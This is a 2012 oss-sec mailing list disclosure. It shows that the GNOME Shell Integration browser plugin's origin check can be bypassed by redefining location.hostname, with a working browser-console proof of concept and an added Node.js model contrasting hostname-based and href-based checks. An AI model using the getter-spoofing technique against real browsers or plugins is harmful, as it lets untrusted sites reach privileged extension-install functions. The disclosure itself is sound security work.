oss-sec mailing list archives
note on gnome shell extensions
From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sun, 9 Sep 2012 00:36:26 +0200
List, I just installed Fedora 17 on a workstation. While researching how to
upgrade gnome 3 to version 2, I noticed it installed a browser extension
called "Gnome Shell Integration".

    $ rpm -qf /usr/lib64/mozilla/plugins/libgnome-shell-browser-plugin.so
    gnome-shell-3.4.1-5.fc17.x86_64

The NPPVpluginDescriptionString states "It can be used only by
extensions.gnome.org", but I happen to know that is a tricky thing to get
right.

      if (!funcs.getproperty (instance, NPVARIANT_TO_OBJECT (document),
                              funcs.getstringidentifier ("location"),
                              &location))
        goto out;

      if (!NPVARIANT_IS_OBJECT (location))
        goto out;

      hostname = get_string_property (instance,
                                      NPVARIANT_TO_OBJECT (location),
                                      "hostname");

      if (g_strcmp0 (hostname, ORIGIN))
        {
          g_debug ("origin does not match, is %s",
                   hostname);

          goto out;
        }

I'm familiar with this topic as I wrote a tool for managing broken but
necessary plugins by restricting them to trusted domains.
http://code.google.com/p/nssecurity
As far as I know, browsers only attempt to prevent tampering with
document.location.href, anything else can be modified. For example, this
works in Chrome, I don't know the syntax for Mozilla:

    location.__defineGetter__("hostname", function () { return "arbitrary"; })
    undefined
    location.hostname
    "arbitrary"

However,

    location.__defineGetter__("href", function () { return "arbitrary"; })
    undefined
    location.href
    "http://realurl.test/asdasd"

So this should fail:

    o = document.createElement('OBJECT')
    <object></object>
    o.setAttribute('TYPE', 'application/x-gnome-shell-integration')
    undefined
    document.body.appendChild(o)
    <object type="application/x-gnome-shell-integration"></object>
    o.shellVersion
    undefined

But we can re-insert it and make it work:

    document.body.removeChild(o)
    <object type="application/x-gnome-shell-integration"></object>
    location.__defineGetter__("hostname", function () { return "extensions.gnome.org"; })
    undefined
    document.body.appendChild(o)
    <object type="application/x-gnome-shell-integration"></object>
    o.shellVersion
    "3.4.1"
    document.location.href
    "https://www.redhat.com/"

The plugin incorrectly trusted hostname, and initialized.

As far as I can tell, the plugin will let you install new shell extensions,
I don't know what the impact of that is, can they contain native code?

Tavis.

--
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------
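
Added example (not part of the original post and not gnome-shell code): a Node.js model of the origin check quoted in the message, comparing a decision made on the script-visible hostname property with one derived from href. The helper names and the mock location object are hypothetical, ORIGIN is assumed to be the hostname named in the plugin description, and the locked href models the post's observation rather than a browser guarantee.

```javascript
// Constructed model of the check discussed in the post; runs in Node.js.
const ORIGIN = "extensions.gnome.org"; // assumed value, from the plugin description

// Hypothetical stand-in for a page's `location`: `href` is locked (as the post
// observes), `hostname` is a configurable accessor that page script can redefine.
function makeLocation(realUrl) {
  const loc = {};
  Object.defineProperty(loc, "href", {
    get: () => realUrl, enumerable: true, configurable: false,
  });
  Object.defineProperty(loc, "hostname", {
    get: () => new URL(realUrl).hostname, enumerable: true, configurable: true,
  });
  return loc;
}

// Same decision as the plugin excerpt: compare the script-visible hostname.
function allowByHostname(loc) {
  return loc.hostname === ORIGIN;
}

// Derive the host from the property the page cannot redefine in this model.
function allowByHref(loc) {
  let url;
  try { url = new URL(loc.href); } catch (e) { return false; } // fail closed
  return url.hostname === ORIGIN;
}

// Models page script replacing a getter; returns whether the change took effect.
function pageRedefines(loc, prop, value) {
  try {
    Object.defineProperty(loc, prop, { get: () => value, configurable: true });
    return true;
  } catch (e) {
    return false; // non-configurable property: redefinition rejected
  }
}

function demo() {
  const loc = makeLocation("https://www.redhat.com/");
  const before = { hostname: allowByHostname(loc), href: allowByHref(loc) };
  const hostnameChanged = pageRedefines(loc, "hostname", ORIGIN);
  const hrefChanged = pageRedefines(loc, "href", "https://" + ORIGIN + "/");
  const after = { hostname: allowByHostname(loc), href: allowByHref(loc) };
  return { before, hostnameChanged, hrefChanged, after };
}

console.log(JSON.stringify(demo(), null, 2));
```

Only the hostname-based decision flips after the page redefines the getter; any value a plugin reads through page-scriptable properties is input from the page, not a statement by the browser.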
